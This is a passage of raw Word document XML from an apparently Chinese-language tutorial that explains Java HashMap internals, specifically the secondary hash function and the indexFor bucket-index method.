      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int hash = hash(key.hashCode());</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的一个自定义的</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash,</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key.hashCode()</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础上进行二次</w:t>
      </w:r>
      <w:r w:rsidR="008A2AD9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> hash(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> h) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        h ^= (h &gt;&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>) ^ (h &gt;&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> h ^ (h &gt;&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>) ^ (h &gt;&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="004556BB" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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这样做的目的就是为了改进传统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法，而且尽量保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的每一位都会影响到最后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值，以达到减少</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>冲突的目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>indexFor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="008A2AD9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>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hashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是根据这个方法定位到某个元素，将要存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方向，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数组的哪个位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> indexFor(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> h, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> length) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2AD9" w:rsidRPr="00F41A4C" w:rsidRDefault="008A2AD9" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> h &amp; (length-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315D34" w:rsidRPr="003D63A1" w:rsidRDefault="008A2AD9" w:rsidP="003D63A1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
